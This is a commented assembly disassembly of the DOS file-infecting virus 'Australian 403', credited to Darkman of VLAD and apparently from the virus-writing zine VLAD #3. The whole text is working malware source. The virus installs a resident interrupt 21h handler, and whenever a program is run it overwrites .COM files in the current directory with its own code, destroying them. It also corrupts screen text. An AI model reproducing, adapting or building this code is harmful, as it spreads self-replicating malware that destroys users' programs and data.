; Darkman/VLAD
; Proudly Presents
; Disassembly of Australian 403
aussie403 segment
assume cs:aussie403,ds:aussie403,es:aussie403
org 100h ; Origin of COM-file
code:
jmp resident
stackptr dw ? ; Stack pointer
stackseg dw ? ; Stack segment
accumulator dw ? ; Accumulator register
message db 00h,0dh,0ah
db 'ScUD 1991!' ; Message by the author
db 0dh,0ah
stackbytes db 41h dup(?) ; Stack
int21off dw ? ; Offset of interrupt 21h
int21seg dw ? ; Segment of interrupt 21h
filespec db '*.COM',00h ; File specification
filehandle dw ? ; File handle
dta: ; Disk transfer area (DTA)
drive db ? ; Drive letter
searchtemp db 0bh dup(?) ; Search template
reserved db 09h dup (?) ; Reserved
fileattr dw ? ; File attribute
filetime db ? ; File time
filedate dw ? ; File date
filesize dd ? ; Filesize
filename db 0dh dup (?) ; Filename + extension
fill db 04h dup (?) ; Fill of virus
virusint21 proc near ; Interrupt 21h of Australian 403
mov cs:stackptr,sp ; Save stack pointer
mov cs:stackseg,ss ; Save stack segment
mov cs:accumulator,ax ; Save accumulator register
lea sp,message ; SP = offset of message
nop
add sp,4eh
mov ax,cs
mov ss,ax
mov ax,cs:accumulator ; Load accumulator register
cmp ah,4bh ; Load or execute a program?
je service4b ; Equal? Jump to service4b
jmp virusexit
service4b:
push ax ; Save AX at stack
push bx ; Save BX at stack
push cx ; Save CX at stack
push dx ; Save DX at stack
push ds ; Save DS at stack
push es ; Save ES at stack
push si ; Save SI at stack
push di ; Save DI at stack
mov ax,0b800h
mov ds,ax ; DS = text color screen segment
mov bx,00h
chkscreen:
mov al,[bx] ; Read from screen
cmp al,'0' ; Zero?
jne fuckscreen ; Not equal? Jump to fuckscreen
mov al,'O' ; Convert zeros to O's
fuckscreen:
mov [bx],al ; Write to screen
inc bx ; Increase BX
inc bx ; Increase BX
cmp bx,1000h ; End of screen?
jne chkscreen ; Not equal? Jump to chkscreen
mov ax,cs
mov ds,ax
lea dx,dta ; DX = offset of dta
mov ah,1ah ; Set disk transfer area
pushf ; Save flags at stack
call dword ptr cs:int21off
mov ax,cs
mov ds,ax
lea dx,filespec ; DX = offset of filespec
mov cx,00h ; Set file attribute
mov ah,4eh ; Find first matching file
pushf ; Save flags at stack
call dword ptr cs:int21off
jc infectexit ; Error? Jump to infectexit
cmp word ptr [offset filesize],0193h
jne infect ; Not infected? Jump to infect
findnext:
mov ah,4fh ; Find next matching file
pushf ; Save flags at stack
call dword ptr cs:int21off
jc infectexit ; Error? Jump to infectexit
cmp word ptr [offset filesize],0193h
jne infect ; Not infected? Jump to infect
jmp short findnext
infect:
mov ax,cs
mov ds,ax
lea dx,filename ; DX = offset of filename
mov ah,3ch ; Create a file
mov cx,00h ; Set file attribute
pushf ; Save flags at stack
call dword ptr cs:int21off
mov filehandle,ax ; Save file handle
mov ax,cs
mov ds,ax
mov bx,filehandle ; Load file handle
mov cx,(codeend-code) ; Write 403 bytes
lea dx,code ; DX = offset of code
mov ah,40h ; Write to file
pushf ; Save flags at stack
call dword ptr cs:int21off
mov bx,filehandle ; Load file handle
mov ah,3eh ; Close file
pushf ; Save flags at stack
call dword ptr cs:int21off
infectexit:
pop di ; Load DI from stack
pop si ; Load SI from stack
pop es ; Load ES from stack
pop ds ; Load DS from stack
pop dx ; Load DX from stack
pop cx ; Load CX from stack
pop bx ; Load BX from stack
pop ax ; Load AX from stack
virusexit:
mov sp,cs:stackptr ; Load stack pointer
mov ax,cs:stackseg
mov ss,ax ; Load stack segment
mov ax,cs:accumulator ; Load accumulator register
jmp dword ptr cs:int21off
endp
resident:
mov ax,cs
mov ds,ax
mov es,ax
mov ss,ax
mov ax,3521h ; Get address of interrupt 21h
int 21h ; Do it!
mov int21off,bx ; Save offset of interrupt 21h
mov int21seg,es ; Save segment of interrupt 21h
mov ax,cs
mov ds,ax
mov ax,2521h ; Set address of interrupt 21h
lea dx,virusint21 ; DX = offset of virusint21
int 21h ; Do it!
mov dx,293h ; Reserve 672 bytes of memory
int 27h ; Terminate but stay resident
codeend:
aussie403 ends
end code
- VLAD #3 INDEX -